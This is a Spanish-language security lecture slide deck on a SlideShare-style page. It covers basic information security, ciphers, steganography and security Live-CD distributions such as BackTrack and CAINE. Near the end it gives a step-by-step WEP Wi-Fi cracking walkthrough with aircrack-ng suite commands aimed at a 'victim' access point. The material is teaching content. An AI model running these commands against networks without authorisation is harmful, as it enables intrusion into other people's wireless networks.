DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...
DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...
 
Satelite Simon Bolivar - UNEFA
Satelite Simon Bolivar - UNEFASatelite Simon Bolivar - UNEFA
Satelite Simon Bolivar - UNEFA
 
Redes satelitales - UNEFA
Redes satelitales - UNEFARedes satelitales - UNEFA
Redes satelitales - UNEFA
 

Kürzlich hochgeladen

TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxlclcarmen
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICAÁngel Encinas
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxYadi Campos
 
Imperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperioImperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperiomiralbaipiales2016
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularMooPandrea
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioELIASAURELIOCHAVEZCA1
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...JAVIER SOLIS NOYOLA
 
plan de capacitacion docente AIP 2024 clllll.pdf
plan de capacitacion docente  AIP 2024          clllll.pdfplan de capacitacion docente  AIP 2024          clllll.pdf
plan de capacitacion docente AIP 2024 clllll.pdfenelcielosiempre
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxzulyvero07
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dstEphaniiie
 
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxnandoapperscabanilla
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfFrancisco158360
 
Estrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxEstrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxdkmeza
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...JonathanCovena1
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfenelcielosiempre
 
Valoración Crítica de EEEM Feco2023 FFUCV
Valoración Crítica de EEEM Feco2023 FFUCVValoración Crítica de EEEM Feco2023 FFUCV
Valoración Crítica de EEEM Feco2023 FFUCVGiustinoAdesso1
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónLourdes Feria
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 

Kürzlich hochgeladen (20)

TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptxTIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
TIPOLOGÍA TEXTUAL- EXPOSICIÓN Y ARGUMENTACIÓN.pptx
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
 
Imperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperioImperialismo informal en Europa y el imperio
Imperialismo informal en Europa y el imperio
 
Ley 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circularLey 21.545 - Circular Nº 586.pdf circular
Ley 21.545 - Circular Nº 586.pdf circular
 
origen y desarrollo del ensayo literario
origen y desarrollo del ensayo literarioorigen y desarrollo del ensayo literario
origen y desarrollo del ensayo literario
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
 
plan de capacitacion docente AIP 2024 clllll.pdf
plan de capacitacion docente  AIP 2024          clllll.pdfplan de capacitacion docente  AIP 2024          clllll.pdf
plan de capacitacion docente AIP 2024 clllll.pdf
 
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptxACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
ACUERDO MINISTERIAL 078-ORGANISMOS ESCOLARES..pptx
 
Unidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la InvestigaciónUnidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la Investigación
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes d
 
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptxORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
ORGANIZACIÓN SOCIAL INCA EN EL TAHUANTINSUYO.pptx
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
 
Estrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptxEstrategias de enseñanza-aprendizaje virtual.pptx
Estrategias de enseñanza-aprendizaje virtual.pptx
 
La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...
 
plande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdfplande accion dl aula de innovación pedagogica 2024.pdf
plande accion dl aula de innovación pedagogica 2024.pdf
 
Valoración Crítica de EEEM Feco2023 FFUCV
Valoración Crítica de EEEM Feco2023 FFUCVValoración Crítica de EEEM Feco2023 FFUCV
Valoración Crítica de EEEM Feco2023 FFUCV
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
 
Estrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcciónEstrategia de prompts, primeras ideas para su construcción
Estrategia de prompts, primeras ideas para su construcción
 
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática4    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática4    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática4 MPG 2024 Ccesa007.pdf
 

Seguridad informatica (live cd) 1.2

  • 1. SEGURIDAD INFORMÁTICA Distribuciones Live-CD Prof. Manuel Mujica manuel@ubuntu.org.ve
  • 2. CONTENIDO  ¿Qué es seguridad de la información?  ¿Por qué seguridad informática?  Modelos de ataques  Criptografía  Esteganografía  Distribuciones Live-CD  Ejemplos
  • 3. ¿Qué es Seguridad de la Información? Seguridad de información es mucho más que establecer “firewalls”, aplicar parches para corregir nuevas vulnerabilidades en el sistema de software, o guardar en la bóveda los “backups”. Seguridad de información es determinar qué requiere ser protegido y por qué, de qué debe ser protegido y cómo protegerlo.
  • 4. ¿Qué es Seguridad de la Información? La seguridad de información se caracteriza por la preservación de: CONFIDENCIALIDAD : La información está protegida de personas no autorizadas. INTEGRIDAD : La información está como se pretende, sin modificaciones inapropiadas. DISPONIBILIDAD : Los usuarios tienen acceso a la información y a los activos asociados cuando lo requieran.
  • 5. ¿Por qué seguridad informática? RSA, la División de Seguridad de EMC (NYSE: EMC), anunció los resultados de la Encuesta mundial sobre seguridad del consumidor en línea del año 2010: 92% realizó una transacción bancaria en línea y el 80% realizó una compra en línea. Un reciente estudio de Federal Deposit Insurance Corporation (FDIC) indica que durante el último trimestre de 2009, los ciberdelincuentes robaron más de 150 millones de dólares de cuentas bancarias de pequeñas y medianas empresas norteamericanas.
  • 6. Modelos de Ataques E R E R I I Intercepción Modificación E R E R E: Emisor I I R: Receptor I: Intruso Fabricación Interrupción
  • 7. Criptografía Técnica para ocultar y así proteger información Técnica para ocultar y así proteger información mientras permanece en disco mientras permanece en disco o mientras está en tránsito o mientras está en tránsito Substitución: Cambia un carácter por uno o varios caracteres M U R C I E L A GO 0 1 2 3 4 5 6 7 8 9 Hola como estas H967 3909 5ST7S
  • 8. Criptografía Substitución. Sustituir un elemento del alfabeto del texto-plano por uno que corres- ponde al alfabeto del texto-cifrado. El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I, J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z Texto-plano: UNIVERSIDAD Texto-cifrado: XPLYHUVLGChG
  • 9. Criptografía Transposición (Permutación). Permuta los caracteres del texto plano. Texto-plano: ESTE ES UN MENSAJE DE PRUEBA! Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP! E S T E E S U NM E N S A J E D E P R U E B A !
  • 10. Esteganografía El término "esteganografía" viene del griego stegos, que signi- fica "cubierta", por lo que esteganografía significaría "escritu- ra oculta" o "escritura encubierta". Así pues, la esteganografía es el conjunto de técnicas que per- miten ocultar o camuflar la información. Nótese que la criptografía modifica los datos para que no sean legibles, a diferencia de la esteganografía, que simplemente los toma y los oculta entre otros datos. La esteganografía se utiliza para crear canales encubiertos (covert channels) y marcas de agua (watermarks) para proteger derechos de autor.
  • 13. nUbuntu nUbuntu o Network Ubuntu es un proyecto para tomar la distribución Ubuntu existente y reconvertirla en un LiveCD e instalación completa con las herramientas necesarias para realizar pruebas de penetración en servidores y redes. La distro incluye algunos de los programas de seguridad para Linux más usados, tales como Ethereal, nmap, dSniff, y Ettercap. Distribución GNU/Linux Fuente: http://www.nubuntu.org
  • 14. CAINE CAINE (Computer Aided INvestigative Environment) es una distribución GNU/Linux de origen italiano. Creado como un proyecto de Ingeniería Forense. Proporciona:  Fácil interoperabilidad durante todo el análisis (Preservación, Recolección, Análisis, Reportes).  Amigable entorno gráfico.  Ubuntu como sistema base.  Generación semi-automática de reportes.
  • 15. CAINE Algunas herramientas incluidas:  Grissom Analyzer  Automated Image & Restore (AIR)  Guymager  Foremost and Scalpel  Autopsy 2.20 and TSK 3.0  SFDumper  Fundl  Stegdetect  Ophcrack CAINE es Open Source Fuente: http://www.caine-live.net/
  • 16. BackTrack BackTrack es una distribución GNU/Linux en formato Live-CD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. Sistema base Ubuntu.
  • 17. BackTrack Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fuente: http://www.backtrack-linux.org/
  • 18. BackTrack Lista de Herramientas:  Recolección de Información (37) Dig, TCPtraceroute, Tctrace, Whoami.  Mapeo de Redes (28) Hping, Nmap  Identificación de Vulnerabilidades (65) GFI LanGuard, Nikto, SuperScan  Penetración (12) OpenSSL-To-Open, Pirana  Escalada de Privilegios (48) Etherape, EtterCap, Wireshark  Mantenimiento de Acceso (15) Backdoors, CryptCat
  • 19. BackTrack Lista de Herramientas:  Cubrimiento (1) Housekeeping  Análisis de redes inalámbricas 802.11 WIFI (25): aircrack-ng, Airsnort Bluetooth (22): Btcrack, hstest  VOIP & Análsis telefónico (7) SIPdump, Smap  Ingeniería forence (13) Autopsy, DD_Rescue, Foremost, Rootkithunter  Ingeniería Inversa (7) GDB GNU Debugger, GDB Console GUI  Servicios (1) SNORT
  • 20. Ejemplos: steghide Adjuntar adj.txt en cvr.jpg: #steghide embed -cf cvr.jpg -ef adj.txt Extraer datos adjuntos desde cvr.jpg: #steghide extract -sf cvr.jpg
  • 22. Nikto
  • 23. Nikto
  • 24. Ejemplos: crack wep wifi Términos: ------------- BSSID (mac del router que da la señal) PWR (Poder de señal) CHN (Canal que se encuentra la red) ENCR (Es el tipo de contraseña que tiene la red) ESSID (Nombre de la red inalámbrica).
  • 25. Ejemplos: crack wep wifi Caso 1: Red sin Filtro de MAC: Abrimos una Terminal (consola 1): 1. Ponemos la tarjeta en modo monitor con airmon-ng airmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1, ath0,. Ejemplo: #airmon-ng start wlan0 En modo monitor, la tarjeta quedara renombrada como: mon0 o mon1
  • 26. Ejemplos: crack wep wifi Caso 1: Red sin Filtro de MAC: 2. Escaneamos las redes wireless con airodump-ng airodump-ng [nombre tarjeta inalámbrica] --> mon0, mon1….. Ejemplo: #airodump-ng mon0 Verificamos el canal (CH) en el que está trabajando la red al cual atacaremos. Presionamos Ctrl + c para detener el escaneo.
  • 27. Ejemplos: crack wep wifi Caso 1: Red sin Filtro de MAC: Abrimos otra Terminal (consola 2): 1. Nos asociamos a la red inalámbrica con aireplay-ng aireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi] Ejemplo: #aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0 2. Empezamos a inyectar paquetes a la red asociada con aireplay- ng aireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi] Ejemplo: #aireplay-ng -3 –b 11:22:33:44:55:66 mon0
  • 28. Ejemplos: crack wep wifi Caso 1: Red sin Filtro de MAC: Abrimos otra Terminal (consola 3): 1. Una vez capturado una gran cantidad de datos (Data) vamos a crackear la red inalámbrica con aircrack-ng aircrack-ng [filename]-01.cap Ejemplo: #aircrack-ng wep-01.cap
  • 29. GRACIAS POR SU ATENCIÓN "Sólo hay un bien: el conocimiento. Sólo hay un mal: la ignorancia." Sócrates.
  • 30. http://pide.wordpress.com CONTACTO: email: manuel@ubuntu.org.ve OpenPGP keys:7661B42E http://pgp.cs.uu.nl/ Twitter: @mmujica001 Ubuntu User #4728 Linux User #439689 Blog's: http://pide.wordpress.com http://www.ubuntu-ve.org http://creativecommons.org/licenses/by/3.0/deed.es